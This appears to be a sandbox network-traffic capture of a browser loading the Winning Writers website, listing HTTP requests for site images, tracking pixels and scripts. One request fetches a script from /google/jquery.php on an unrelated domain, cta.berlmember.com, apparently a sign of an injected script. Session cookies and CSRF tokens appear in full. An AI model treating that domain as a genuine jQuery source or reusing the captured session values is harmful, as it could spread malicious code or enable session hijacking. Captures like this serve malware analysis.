          Source: global trafficHTTP traffic detected: GET /assets/images/social-sprite-2020.png HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/assets/css/style.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
          Source: global trafficHTTP traffic detected: GET /graphics/home_page_slide_victor.jpg HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
          Source: global trafficHTTP traffic detected: GET /en_US/fbevents.js HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /jquery-migrate-1.2.1.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /google/jquery.php HTTP/1.1Host: cta.berlmember.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /graphics/wergle/garnham_home_page_slide_a.jpg HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
          Source: global trafficHTTP traffic detected: GET /assets/images/social-sprite-2019.png HTTP/1.1Host: winningwriters.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
          Source: global trafficHTTP traffic detected: GET /assets/images/seal-transparent-25x40-2019.png HTTP/1.1Host: winningwriters.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
          Source: global trafficHTTP traffic detected: GET /graphics/tomstory/mcnamara_home_page_slide.jpg HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
          Source: global trafficHTTP traffic detected: GET //assets/images/insta_heart.png HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
          Source: global trafficHTTP traffic detected: GET /assets/images/search.png HTTP/1.1Host: winningwriters.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
          Source: global trafficHTTP traffic detected: GET /graphics/tompoetry/hagen_slide_show.jpg HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
          Source: global trafficHTTP traffic detected: GET /assets/images/social-sprite-2020_new.png HTTP/1.1Host: winningwriters.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
          Source: global trafficHTTP traffic detected: GET /graphics/tompoetry/burton_slide_show.jpg HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
          Source: global trafficHTTP traffic detected: GET /v/t51.2885-15/466782117_1219872592424759_7207578631427954565_n.jpg?_nc_cat=108&ccb=1-7&_nc_sid=18de74&_nc_ohc=bwWPeBBNLe4Q7kNvgEG96g1&_nc_zt=23&_nc_ht=scontent-ord5-1.cdninstagram.com&edm=AL-3X8kEAAAA&oh=00_AYBDimk3lRDq0ZNf5WzC3TsApGkaW3ypEC04xNJeJXPwgg&oe=67416EA5 HTTP/1.1Host: scontent-ord5-1.cdninstagram.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /v/t51.2885-15/466498990_932073868801787_4615250428975556945_n.jpg?_nc_cat=108&ccb=1-7&_nc_sid=18de74&_nc_ohc=K2QYvU4QDFwQ7kNvgHexzPp&_nc_zt=23&_nc_ht=scontent-ord5-1.cdninstagram.com&edm=AL-3X8kEAAAA&oh=00_AYB6H6C6vXmQz4o0NOzYmapDE6_aoksGSCqZ4e0xcfBfbw&oe=6741529C HTTP/1.1Host: scontent-ord5-1.cdninstagram.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /assets/images/social-sprite-2020.png HTTP/1.1Host: winningwriters.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
          Source: global trafficHTTP traffic detected: GET /graphics/home_page_slide_victor.jpg HTTP/1.1Host: winningwriters.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
          Source: global trafficHTTP traffic detected: GET /graphics/tomstory/liu_home_page_slide.jpg HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
          Source: global trafficHTTP traffic detected: GET /ads/pixel.js HTTP/1.1Host: www.redditstatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /assets/images/logo@2x.png HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
          Source: global trafficHTTP traffic detected: GET /uwt.js HTTP/1.1Host: static.ads-twitter.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1072733940/?random=1731960006858&cv=11&fst=1731960006858&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /td/rul/1072733940?random=1731960006858&cv=11&fst=1731960006858&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET //assets/images/insta_heart.png HTTP/1.1Host: winningwriters.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007
          Source: global trafficHTTP traffic detected: GET /en_US/fbevents.js HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /signals/config/188856481728275?v=2.9.177&r=stable&domain=winningwriters.com&hme=c3e4904c1dde42d643265ef909b9e193c41cedcd6f559a3ff5e1b178e36647fa&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113 HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /graphics/wergle/garnham_home_page_slide_a.jpg HTTP/1.1Host: winningwriters.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007
          Source: global trafficHTTP traffic detected: GET /assets/js/ga-track.js HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
          Source: global trafficHTTP traffic detected: GET /assets/js/hoverintent.js HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
          Source: global trafficHTTP traffic detected: GET /graphics/tomstory/mcnamara_home_page_slide.jpg HTTP/1.1Host: winningwriters.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007
